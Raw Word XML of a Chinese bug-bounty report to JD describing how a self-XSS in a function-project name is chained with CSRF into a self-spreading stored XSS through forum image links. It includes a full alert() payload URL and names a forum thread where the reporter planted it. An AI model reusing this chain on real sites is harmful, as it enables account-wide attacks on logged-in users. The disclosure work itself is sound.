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漏洞名称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京东一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SELF-X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之大规模蠕虫攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:pBdr>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="F5F5F5"/>
        </w:pBdr>
        <w:shd w:fill="FFFFFF" w:val="clear"/>
        <w:spacing w:before="300" w:after="300"/>
        <w:ind w:left="75" w:right="75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积分明细</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="199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157"/>
        <w:gridCol w:w="76"/>
        <w:gridCol w:w="2316"/>
        <w:gridCol w:w="2458"/>
        <w:gridCol w:w="5729"/>
        <w:gridCol w:w="4147"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader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4774" w:type="dxa"/>
            <w:gridSpan w:val="2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入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9876" w:type="dxa"/>
            <w:gridSpan w:val="2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细说明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-05-08 11:59:14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single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+16 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（原始积分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6X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倍）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8187" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single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751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分完成，您获得积分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12" w:space="0" w:color="F5F5F5"/>
        </w:pBdr>
        <w:shd w:fill="FFFFFF" w:val="clear"/>
        <w:spacing w:before="300" w:after="300"/>
        <w:ind w:left="75" w:right="75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25" w:right="-225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漏洞详情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发现方式：请尽量详细填写，流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步骤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截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现方法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然后创建一个项目，发现了项目名称 很多个位置是没有做 安全转义的，接下来，我插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lt;i&gt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签测试，发现存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但是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LF-XSS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/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5269230" cy="43351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1849100" cy="8324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个时候正常来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LF-X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能配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R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来组合拳攻击，但是一般需要点击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R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有什么危害，我将我自己使用的老套路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R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E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，这样子 就能发挥蠕虫了，测试发现可以变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E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求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RF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只需要访问到我指定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RL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直接造成存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攻击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l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://</w:t>
      </w:r>
      <w:r>
        <w:rPr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xxxx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com/function/create?nickName=%3Cscript%3Ealert%28%2721%27%29%3C%2Fscript%3E&amp;descri=Python3%E5%87%BD%E6%95%B0%E7%8E%AF%E5%A2%83%E6%A8%A1%E6%9D%BF&amp;language=python3&amp;templateCode=03&amp;maxMemory=1024&amp;timeout=1&amp;maxConcurrency=50&amp;runAsync=0&amp;codeType=1&amp;file=&amp;entranceFunction=&amp;envK=w2_&amp;envV=123&amp;codeSize=&amp;codeContent=def+handle%28req%2Cevent%29%3A%0D%0A++++%22%22%22handle+a+request+to+the+function%0D%0A++++Args%3A%0D%0A++++++++req+%28str%29%3A+request+body%0D%0A++++++++event+%28map%29%3A+key%28eventId%2CeventTime%29%0D%0A++++%22%22%22%0D%0A++++return+%27%7B%22response%22%3A%7B%22output%22%3A%7B%22text%22%3A%22%E6%AC%A2%E8%BF%8E%E4%BD%BF%E7%94%A8%E5%87%BD%E6%95%B0%E8%AE%A1%E7%AE%97%E6%9C%8D%E5%8A%A1%22%2C%22type%22%3A%22PlainText%22%7D%7D%2C%22shouldEndSession%22%3Atrue%2C%22version%22%3A%221.0%22%7D%27%0D%0A%0D%0A&amp;codeFileName=handler.py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个时候需要去发给用户所以没什么危害，发现了京东有很多论坛，论坛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GURL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图片地址是可控制外部的，我只需将这个链接插入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MGURL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就能够发挥蠕虫攻击，我批量在京东所有论坛中插入那么京东 将被大规模蠕虫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/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5272405" cy="24536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在这里做个蠕虫证明，第一用户访问到被我插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l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帖子就会被插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因为京东的密码是通一登录的，用户登录了京东论坛那么这个 有漏洞的网站也会登录 ，所以非常危险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7353300" cy="796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着是我插入攻击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l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地址，可以证明，为了不影响到京东用户，我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l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插入到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手机论坛官网，怕带来影响，存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yl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的地址为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://www.oneplusbbs.com/thread-4709187-1.html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/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5272405" cy="34728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漏洞证明：请在这里提供利用证明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C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://</w:t>
      </w:r>
      <w:r>
        <w:rPr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xxx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jd.com/function/create?nickName=%3Cscript%3Ealert%28%2721%27%29%3C%2Fscript%3E&amp;descri=Python3%E5%87%BD%E6%95%B0%E7%8E%AF%E5%A2%83%E6%A8%A1%E6%9D%BF&amp;language=python3&amp;templateCode=03&amp;maxMemory=1024&amp;timeout=1&amp;maxConcurrency=50&amp;runAsync=0&amp;codeType=1&amp;file=&amp;entranceFunction=&amp;envK=w2_&amp;envV=123&amp;codeSize=&amp;codeContent=def+handle%28req%2Cevent%29%3A%0D%0A++++%22%22%22handle+a+request+to+the+function%0D%0A++++Args%3A%0D%0A++++++++req+%28str%29%3A+request+body%0D%0A++++++++event+%28map%29%3A+key%28eventId%2CeventTime%29%0D%0A++++%22%22%22%0D%0A++++return+%27%7B%22response%22%3A%7B%22output%22%3A%7B%22text%22%3A%22%E6%AC%A2%E8%BF%8E%E4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修复方案：您觉得靠谱的解决方案是什么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输出安全转义即可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ind w:left="-226" w:right="-226" w:hanging="0"/>
        <w:rPr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一个完整的说明既能反映提交人的基础层次感也更有利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R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同学更快的处理漏洞，规范的报告还有机会获得漏洞加分哦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~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